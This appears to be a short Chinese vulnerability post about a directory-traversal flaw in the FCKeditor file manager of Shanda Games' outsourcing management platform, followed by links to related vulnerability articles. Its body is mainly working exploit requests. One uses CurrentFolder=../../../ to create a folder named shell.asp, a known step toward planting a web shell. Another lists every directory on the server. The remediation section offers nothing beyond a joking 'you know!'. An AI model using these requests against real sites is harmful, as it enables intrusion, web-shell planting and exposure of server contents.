盛大游戏外包管理平台FCK列全盘目路分析与解决方案
摘要:修改CurrentFolder参数使用../../来进入不同的目录/browser/default/connectors/aspx/conn...
修改CurrentFolder 参数使用../../来进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp
根据返回的XML 信息可以查看网站所有的目录。
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
也可以直接浏览盘符:
修复方案:
你懂的!
【盛大游戏外包管理平台FCK列全盘目路分析与解决方案】相关文章:
★ Adobe Photoshop Album Starter Edition BMP图形头处理缓冲区溢出漏洞
★ ShopWind网店系统与罗信网络建站 v1.02 上传漏洞
★ BitTorrent和uTorrent Peers 窗口缓冲区溢出漏洞